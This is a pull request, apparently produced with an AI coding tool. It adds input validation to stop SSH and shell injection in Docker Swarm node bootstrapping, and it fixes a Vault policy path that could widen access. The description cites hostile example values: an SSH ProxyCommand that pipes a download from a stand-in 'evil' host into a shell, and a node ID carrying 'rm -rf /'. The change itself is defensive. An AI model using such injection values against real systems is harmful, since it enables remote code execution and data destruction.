### PR TITLE
fix(bootstrap): swarm node SSH/shell injection, Vault policy path expansion (BLOCKER/MAJOR)

### DIFF
--- a/apps/web/src/lib/cluster-bootstrap.ts
+++ b/apps/web/src/lib/cluster-bootstrap.ts
@@ -277,6 +277,22 @@ async function setupDockerSwarm(
 
   // Step 3: Join additional managers and workers
   for (const node of nodes) {
+    // BLOCKER fix: node.host and node.nodeId come from env.metadata (user-supplied) and were
+    // used directly in SSH target and docker label commands without validation.
+    // A crafted host like '-oProxyCommand=...' yields SSH option injection; a crafted
+    // nodeId like 'x; rm -rf /' yields shell injection in the docker node update command.
+    // Validate both through the same validateSshField function used for the manager host.
+    let safeNodeHost: string
+    let safeNodeId: string
+    try {
+      safeNodeHost = validateSshField(node.host, 'node.host', /^[a-zA-Z0-9]([a-zA-Z0-9.-]{0,252}[a-zA-Z0-9])?$/)
+      safeNodeId   = validateSshField(node.nodeId, 'node.nodeId', /^[a-zA-Z0-9][a-zA-Z0-9:_-]{0,63}$/)
+    } catch (e) {
+      console.error(`[bootstrap] Skipping swarm node with invalid host/nodeId: ${e}`)
+      emit({ type: 'log', message: `Skipped node with invalid host/nodeId: ${e}` })
+      continue
+    }
+
     const isManager = node.role === 'manager'
     const token = isManager ? managerToken : workerToken
     if (!token) {
@@ -284,13 +300,13 @@ async function setupDockerSwarm(
       continue
     }
 
-    emit({ type: 'step', message: `Joining ${node.role} node ${node.host}...` })
+    emit({ type: 'step', message: `Joining ${node.role} node ${safeNodeHost}...` })
     const joinCmd = [
       'ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null',
-      '-t', `${connection.user}@${node.host}`,
+      '-t', `${connection.user}@${safeNodeHost}`,
       `docker swarm join --token "${token}" ${connection.host}:2377`,
     ]
-    if (connection.port) joinCmd.splice(joinCmd.indexOf(`${connection.user}@${node.host}`), 0, '-p', String(connection.port))
+    if (connection.port) joinCmd.splice(joinCmd.indexOf(`${connection.user}@${safeNodeHost}`), 0, '-p', String(connection.port))
 
     await runCommand('ssh', joinCmd.slice(1), {}, msg => emit({ type: 'log', message: msg }))
   }
@@ -300,10 +316,10 @@ async function setupDockerSwarm(
   for (const node of nodes) {
     const labelCmd = [
       'ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null',
-      '-t', `${connection.user}@${node.host}`,
-      `docker node update --label-add orion/env=${connection.user} ${node.nodeId}`,
+      '-t', `${connection.user}@${safeNodeHost}`,
+      `docker node update --label-add orion/env=${connection.user} ${safeNodeId}`,
     ]
-    if (connection.port) labelCmd.splice(labelCmd.indexOf(`${connection.user}@${node.host}`), 0, '-p', String(connection.port))
+    if (connection.port) labelCmd.splice(labelCmd.indexOf(`${connection.user}@${safeNodeHost}`), 0, '-p', String(connection.port))
 
     await runCommand('ssh', labelCmd.slice(1), {}, msg => emit({ type: 'log', message: msg }))
   }
@@ -993,8 +1009,11 @@ async function bootstrapK8sVaultAndEso(
 
     const policyRes = await vaultRequest(`sys/policies/acl/${policyName}`, rootToken, 'PUT', {
       policy: [
-        `path "secret/data/${env.name}/*" { capabilities = ["read", "list"] }`,
-        `path "secret/metadata/${env.name}/*" { capabilities = ["read", "list"] }`,
+        // MAJOR fix: env.name was used directly in Vault policy paths without slugification.
+        // An env name containing '*' or '/' (e.g. '*') would widen the policy to all secrets.
+        // Use the same slug used for policyName/roleName — consistent and safe.
+        `path "secret/data/${policyName}/*" { capabilities = ["read", "list"] }`,
+        `path "secret/metadata/${policyName}/*" { capabilities = ["read", "list"] }`,
       ].join('\n'),
     })
     if (!policyRes.ok) throw new Error(`Vault policy creation failed (${policyRes.status})`)

--- a/apps/web/src/lib/cluster-bootstrap.ts
+++ b/apps/web/src/lib/cluster-bootstrap.ts
@@ -314,12 +314,20 @@ async function setupDockerSwarm(
   // Step 4: Label nodes
   emit({ type: 'step', message: 'Labeling swarm nodes...' })
   for (const node of nodes) {
+    let safeHost: string
+    let safeId: string
+    try {
+      safeHost = validateSshField(node.host, 'node.host', /^[a-zA-Z0-9]([a-zA-Z0-9.-]{0,252}[a-zA-Z0-9])?$/)
+      safeId   = validateSshField(node.nodeId, 'node.nodeId', /^[a-zA-Z0-9][a-zA-Z0-9:_-]{0,63}$/)
+    } catch {
+      continue
+    }
     const labelCmd = [
       'ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null',
-      '-t', `${connection.user}@${safeNodeHost}`,
-      `docker node update --label-add orion/env=${connection.user} ${safeNodeId}`,
+      '-t', `${connection.user}@${safeHost}`,
+      `docker node update --label-add orion/env=${connection.user} ${safeId}`,
     ]
-    if (connection.port) labelCmd.splice(labelCmd.indexOf(`${connection.user}@${safeNodeHost}`), 0, '-p', String(connection.port))
+    if (connection.port) labelCmd.splice(labelCmd.indexOf(`${connection.user}@${safeHost}`), 0, '-p', String(connection.port))
 
     await runCommand('ssh', labelCmd.slice(1), {}, msg => emit({ type: 'log', message: msg }))
   }


### PR DESCRIPTION
## Summary

**BLOCKER — swarm node.host/nodeId SSH and shell injection**
`setupDockerSwarm` pulled `host` and `nodeId` from `env.metadata.swarmNodes` (user-supplied via API) and used them directly as SSH targets and in docker label commands — no validation. Examples:
- `node.host = '-oProxyCommand=curl http://evil|sh'` → SSH option injection
- `node.nodeId = 'x; rm -rf /'` → shell injection in `docker node update`

The manager `host` went through `validateSshField()` but swarm nodes were missed. Added `validateSshField()` for both `node.host` and `node.nodeId` in both the join loop and the label loop; invalid nodes are skipped with a log message.

**MAJOR — Vault policy capability paths not slugified**
```
path "secret/data/${env.name}/*" { capabilities = ["read","list"] }
```
`env.name` was used raw — an env named `*` produces `secret/data/*/*`, granting the cluster's AppRole read access to every environment's secrets. The policy/role *names* were already correctly slugified; the *paths* were not. Fixed to use `policyName` (the already-slugified value) for consistency.

🤖 Generated with [Claude Code](https://claude.com/claude-code)